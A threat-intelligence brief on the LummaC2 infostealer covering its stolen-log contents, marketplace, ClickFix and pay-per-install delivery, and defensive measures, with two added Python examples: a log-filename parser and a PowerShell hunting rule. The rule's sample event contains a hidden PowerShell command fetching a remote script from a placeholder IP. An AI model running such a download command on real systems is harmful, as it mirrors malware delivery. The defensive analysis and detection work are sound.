Threat brief - May 8, 2025
Cybercriminals are always seeking easy and fast money. Around 2015, an information stealer known as Pony gained popularity for its ability to extract credentials saved in web browsers. Easily accessible online, Pony was leveraged by a wide variety of criminals who aimed to distribute the malware to as many victims as possible and mine stored credentials for accounts that could be directly monetized (e.g., banking and cryptocurrency accounts) or sold on underground markets (e.g., streaming services, gaming accounts, and online shops). The stolen data was compiled into a bundled ZIP file typically called a log (or “лог”). Although we don’t see much of Pony today, there have been many generations of improved information stealers along the way, including some that have become very widespread like Lumma Stealer (also known as LummaC2).
We care a lot about information stealing malware because the impact can be significant. In addition to potentially compromising an individual victim’s financial accounts, the credentials exfiltrated by information stealing malware are mined by initial access brokers who find remote access accounts for enterprise environments that could later be sold as entry points for ransomware operations. The initial access broker typically sells a single corporate access credential for anywhere from a few hundred dollars to several thousand dollars, depending on factors such as the target organization’s number of computers, industry, geographic location, and annual revenue. An individual bundle of credentials for a machine sold on a criminal market may range in price from $1 to $100 or more based on the type of accounts present and the locality. The LummaC2 marketplace, as depicted below, includes search capabilities for domains, countries, cryptocurrency wallets, and credentials, with some data offered exclusively to a single buyer.
LummaC2’s Marketplace
An infostealer log is a single bundle of files that may include credentials saved in a web browser, autofill files, cryptocurrency wallets, lists of processes, application data, and other valuable information about the compromised machine that could be monetized. Below is an example of a filename for a LummaC2 log:
[US ][MetaMask Phantom]<redacted>.234.46.59[1744493224].zip
The filename shows the two-letter country code of the victim’s location, some hint about valuable applications present (i.e., MetaMask and Phantom), the IP address of the victim, and the Unix timestamp when the log was created. Inside the ZIP archive are the following files and folders:
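Parsing that naming scheme is a first triage step when a batch of logs turns up in a bulk collection. The parser below is an added example, not code from the brief; the IP addresses and timestamps in its sample names are constructed, and the exact padding of the country field is an assumption based on the single filename shown above.

```python
import re
from datetime import datetime, timezone

# Filename layout described in the brief: "[CC ][App1 App2]<ip>[<unix_ts>].zip"
# The country code is followed by a space in the sample; app hints are space-separated.
LOG_NAME_RE = re.compile(
    r"^\[(?P<country>[A-Z]{2})\s*\]"        # two-letter country code, possibly padded
    r"\[(?P<apps>[^\]]*)\]"                 # hints about valuable apps (may be empty)
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"      # victim IPv4 address
    r"\[(?P<ts>\d{9,10})\]"                 # Unix timestamp when the log was created
    r"\.zip$"
)

def parse_log_name(name: str) -> dict:
    """Split a LummaC2-style log filename into its fields; raise on anything else."""
    m = LOG_NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a LummaC2-style log name: {name!r}")
    if any(int(o) > 255 for o in m["ip"].split(".")):
        raise ValueError(f"invalid IPv4 address in log name: {m['ip']}")
    created = datetime.fromtimestamp(int(m["ts"]), tz=timezone.utc)
    return {
        "country": m["country"],
        "apps": m["apps"].split(),
        "ip": m["ip"],
        "created_utc": created.isoformat(),
    }

# Constructed sample names: documentation-range IPs, made-up timestamps, no real victims.
SAMPLE_NAMES = [
    "[US ][MetaMask Phantom]203.0.113.59[1744493224].zip",
    "[DE ][]198.51.100.7[1744500000].zip",
]

def triage(names) -> dict:
    """Summarise a batch: logs per country and how many advertise an application hint."""
    summary = {"by_country": {}, "with_app_hint": 0}
    for n in names:
        info = parse_log_name(n)
        summary["by_country"][info["country"]] = summary["by_country"].get(info["country"], 0) + 1
        if info["apps"]:
            summary["with_app_hint"] += 1
    return summary

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        print(parse_log_name(n))
    print(triage(SAMPLE_NAMES))
```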
| Files | Folders |
|---|---|
| All Passwords.txt | Applications/ |
| Brute.txt | Chrome/ |
| Clipboard.txt | Cookies/ |
| DomainDetect.txt | Edge/ |
| Processes.txt | Files/ |
| Screen.png | Opera/ |
| Software.txt | Wallets/ |
| System.txt | |
Many of the folders and filenames in a LummaC2 log are self-explanatory. For example, the file named “Brute.txt” contains a list of just passwords with no associated usernames or context—useful to criminals attempting to brute-force encrypted cryptocurrency wallets. Each browser is assigned a folder (e.g., “Chrome” in the table above), which typically includes saved credentials and an autofill file that may contain sensitive personal information such as names, addresses, phone numbers, and even search terms. The “Files” folder often includes content taken from the victim’s Downloads, Documents, or Desktop folders, where attackers may find password lists or recovery phrases for cryptocurrency wallets.
The “Screen.png” file is a screenshot of the victim’s desktop and can reveal whether the malware is being run in a sandbox—for example, if a corporate logo appears in the background image. The “System.txt” file contains system-level information such as the execution path of the malware, the build ID, and sometimes advertisements or contact information for stealer log tools. It may also reference services like wallet cracking and Telegram channels offering support for the malware.
Most information stealers that do business on the Russian-language crime forums, like Exploit and XSS, have rules forbidding the use of the malware within the Russian Federation. Although logs from Russian victims are less common than those from other countries, they do appear in bulk collections—often including individuals who appear to be Russian nationals living abroad.
Recent information stealer campaigns typically involve social engineering rather than the exploitation of a vulnerability. Microsoft and other security researchers have documented a technique known as ClickFix. In this approach, users who visit compromised websites or encounter malicious ads are presented with a deceptive modal popup, warning them of urgent issues with their computer. The popup instructs users to execute keyboard shortcuts that launch a remote PowerShell script, which then downloads and runs a payload—such as LummaC2.
Lumma’s payloads are typically spread using pay-per-install (PPI) networks or traffic sellers that deliver installs as a service. The price typically depends on the location of the install and if the target device is a mobile phone or a desktop computer. Lumma and many other information stealers are often bundled with cracked versions of popular commercial software, targeting users looking to avoid paying for legitimate licenses. To make matters worse, the operators behind LummaC2 invest significant effort into ensuring their malware evades detection by popular antivirus solutions.
Lumma is a MaaS (Malware-as-a-Service) information stealer that has been advertised on crime forums like Exploit, as shown below.
LummaC2’s advertisement on Exploit from February 2023
Although its initial launch and updates have been promoted on these forums, LummaC2 primarily conducts business through Telegram, where it maintains dedicated (and relatively anonymous) channels for customer support, distribution of updates, and sales. These Telegram channels leverage bots to automate tasks such as licensing, payload generation, and log management, offering a streamlined experience for criminal operators. LummaC2 is known for its frequent version updates, support for a wide range of browsers and cryptocurrency wallets, and a focus on detection evasion. Its logs, as noted earlier, often include credentials, autofill data, system details, and files scraped from user directories, making it valuable for both financial fraud and initial access brokers.
Properly defending against Lumma Stealer involves a layered security approach, since it is a fast-evolving infostealer often delivered via malvertising, phishing, or compromised software. Enterprise defenders should carefully restrict access to new domains, since LummaC2 makes extensive use of newly registered domains (NRDs). Users outside of an enterprise may consider limiting or preventing the execution of PowerShell and other scripts if they do not need them. Enterprise defenders should also consider the following:
Endpoint protection and hardening
- Do not permit users to download executable files from untrusted websites
- Do not permit users to download or execute scripts or Microsoft Office macros that were downloaded from the internet, are unsigned, or that are not explicitly allowed by policy
- Use reputable endpoint detection and response (EDR) tools that can detect suspicious behaviors, like credential scraping or unauthorized file access
- Use application allowlisting to prevent unknown executables (including downloaded payloads) from running
- Disable PowerShell for non-administrative users, or use constrained language mode to reduce abuse risk
Browser and credential hygiene
- Avoid saving passwords in browsers—use a dedicated password manager instead
- Clear autofill data and browser caches regularly
- Disable autofill for sensitive information like names, phone numbers, or addresses, especially on corporate machines
Patch and update regularly
- Keep browsers, operating systems, and all software up to date to reduce exploitability via known vulnerabilities
DNS and network filtering
- Use secure DNS filtering and threat-intelligence-based blocklists to prevent connections to NRDs, known C2 servers, malware delivery domains, and Telegram APIs used for data exfiltration
Email and web filtering
- Implement malicious attachment and link detection in email gateways
- Deploy browser isolation or sandboxing to reduce the risk of drive-by downloads from malvertising
User training
- Educate users about malvertising, fake software installers, and browser scareware tactics like ClickFix, which are common delivery mechanisms
- Warn users not to run PowerShell scripts or click on scare popups instructing them to “fix” computer issues
Detection and threat hunting
- Monitor for:
  - Unusual outbound connections (especially to Telegram or rare domains)
  - Unauthorized credential access from browsers
  - Suspicious PowerShell or process spawning activity (e.g., explorer.exe spawning powershell.exe)
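The last hunting item, combined with the ClickFix delivery chain described earlier (a user-launched PowerShell that fetches a remote script), can be turned into a simple process-creation rule. The code below is an added example, not tooling from the brief: the event records are constructed, the field names are an assumption rather than any particular EDR's schema, and the severity scale is arbitrary.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    host: str
    parent_image: str   # image name of the parent process
    image: str          # image name of the created process
    command_line: str

# Constructed sample process-creation events; not real telemetry, IPs are documentation range.
SAMPLE_EVENTS = [
    ProcEvent("ws01", "explorer.exe", "powershell.exe",
              'powershell.exe -w hidden -c "Invoke-WebRequest http://203.0.113.5/fix.ps1 -OutFile $env:TEMP\\fix.ps1"'),
    ProcEvent("ws02", "explorer.exe", "powershell.exe", "powershell.exe"),
    ProcEvent("ws03", "services.exe", "powershell.exe", "powershell.exe -File C:\\Scripts\\backup.ps1"),
    ProcEvent("ws04", "explorer.exe", "notepad.exe", "notepad.exe"),
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def assess(ev: ProcEvent):
    """Return (severity, reasons) for one event, or None when nothing stands out.
    explorer.exe spawning powershell.exe means the shell was started from the desktop
    (Run dialog, pasted command); a URL in the command line points at a remote script."""
    reasons = []
    if ev.parent_image.lower() == "explorer.exe" and ev.image.lower() == "powershell.exe":
        reasons.append("powershell.exe spawned by explorer.exe")
    if ev.image.lower() == "powershell.exe" and URL_RE.search(ev.command_line):
        reasons.append("PowerShell command line references a URL")
    if not reasons:
        return None
    severity = "high" if len(reasons) == 2 else "medium"
    return severity, reasons

def hunt(events) -> dict:
    """Run assess() over a batch and return alerts keyed by host (one event per host here)."""
    alerts = {}
    for ev in events:
        result = assess(ev)
        if result is not None:
            alerts[ev.host] = result
    return alerts

if __name__ == "__main__":
    for host, (sev, why) in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: {sev} - {'; '.join(why)}")
```

A scheduled backup launched by a service (ws03) and an interactive but URL-free shell (ws02) are kept apart from the ClickFix-shaped case (ws01), which is the tuning a real rule needs to avoid paging on every administrator's console.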